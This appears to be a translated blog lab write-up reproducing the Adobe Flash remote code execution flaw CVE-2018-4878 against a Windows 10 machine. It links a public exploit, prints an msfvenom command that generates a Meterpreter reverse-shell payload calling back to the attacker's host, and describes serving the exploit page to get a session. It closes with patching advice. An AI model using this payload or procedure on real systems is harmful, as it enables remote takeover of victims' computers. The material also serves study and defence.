Adboe Flash _CVE-2018-4878 A remote code execution vulnerability reproducibility

Adboe Flash _CVE-2018-4878 A remote code execution vulnerability reproducibility

First, Vulnerability Description

The vulnerability can be launched targeted attacks against windows users. An attacker could induce the user to open Microsoft Office documents, Web pages, e-mail spam and other malicious Flash code files.

Second, the flaw affects versions

Flash Player version 28.0.0.137 and earlier versions for all

  

Third, the vulnerability reproducible environment to build

Attack: kali ip: 192.168.10.136

Drone: win10 ie default integrated flash, no upgrades

Fourth, the vulnerability reproduction

1.github download exp, https://github.com/anbai-inc/CVE-2018-4878

2. Modify the exp

2.1 modify shellcode shellcode is connected to a rebound of his own generation, first of all to Mr. rebound connection shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.136 lport=8888 -f python >/root/shellcode.txt

  

2.2 Alternatively exp corresponding shellcode shellcode generated by

  

2.3 generating a modified file saved in the path exp

  

3. Run python script, two files are generated, exploit.swf and index.html

4. The exploit.swf index.html and copied to / var / www / html, then open the web service, this time, Kali Linux on the Web service to start, and have the index.html page. As long as drone enabled flash and visit this page, you can directly control

5.kali open listening

  

6. drone access http://192.168.10.136/index.html

  

7. At this point already acquired session end kali

  

Five vulnerabilities defense

1. Download the latest version of Adobe Flash

2. Install the common antivirus software, open real-time protection and real-time antivirus engine upgrade

Guess you like

Origin www.cnblogs.com/yuzly/p/11104935.html